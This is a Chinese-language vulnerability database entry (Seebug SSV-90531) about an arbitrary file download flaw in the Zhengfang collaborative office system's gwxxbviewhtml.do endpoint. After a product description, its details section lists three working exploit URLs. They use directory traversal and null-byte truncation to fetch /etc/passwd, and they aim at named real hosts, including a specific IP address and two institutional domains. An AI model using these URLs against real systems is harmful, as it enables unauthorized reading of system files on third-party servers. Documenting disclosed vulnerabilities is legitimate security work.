正方协同办公系统/zfoa/gwxxbviewhtml.do任意文件下载漏洞

基本字段

漏洞编号：: SSV-90531

披露/发现时间：: 未知

提交时间：: 2016-01-20

漏洞等级：

漏洞类别：: 任意文件下载

影响组件：: zhengfang jwxt
(*)

漏洞作者：: 未知

提交者：: hhxx

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 hhxx 共获得 0.7KB

### 0x01 系统介绍正方协同办公系统的设计目标是帮助各部门快速构建起一个安全、可靠、易用的文档一体化办公环境，实现公文处理的自动化，同时作为内部通讯和信息共享的平台。系统的特点如下：（1）简单易用：实现快速部署，轻松办公　　符合日常办公习惯的界面和操作，通过简单的使用培训，使用人员即可了解系统中的相关办公设置，并可应用系统进行办公。　　（2）灵活的自定义功能，满足个性与变化的需求　　组织机构、表单格式、工作流程、访问权限、打印格式、统计等全面提供自定义，能够很好的满足各单位现在和未来的办公自动化需求。　　（3）多层次的安全设计，为办公自动化提供保障　　系统提供了用户名+密码的身份认证、数据库安全性、表单安全性、文档安全性等多层次的安全设计，确保办公自动化系统的安全运行。　　（4）稳定可靠　　经过大量的功能测试和压力测试，具有很好的稳定性、可靠性。　　（5）符合相关规范和标准　　完全符合《中国共产党机关公文处理条例》、《国家行政机关公文处理办法》、《国家行政机关公文格式》、《中华人民共和国档案法》、《归档文件整理规则》等规范，对各种办公要素均提供有效的支持。　　官方主页：www.zfsoft.com ![](https://images.seebug.org/contribute/dfe4dca3-5682-4cec-a6bf-0c9b792e9493-2016-01-13 12_34_06.jpg) ### 0x02 漏洞细节经过url解码构造，发现只要截断就可以下载任意文件：案例： code 区域 http://202.207.177.104:8018/zfoa/gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00 http://info.lajy.com:8018/zfoa/gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00 http://oa.xzcit.cn/gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00 ![](https://images.seebug.org/contribute/8b460451-6c98-4770-bb8c-753399a4beb2-2016-01-13 12_37_38.jpg) Pocsuite证明： ![](https://images.seebug.org/contribute/1fd3d7d7-cd5a-403c-b99f-127693297b82-2016-01-13 12_48_15.jpg) ### 0x03 参考链接 http://www.wooyun.org/bugs/wooyun-2015-0150337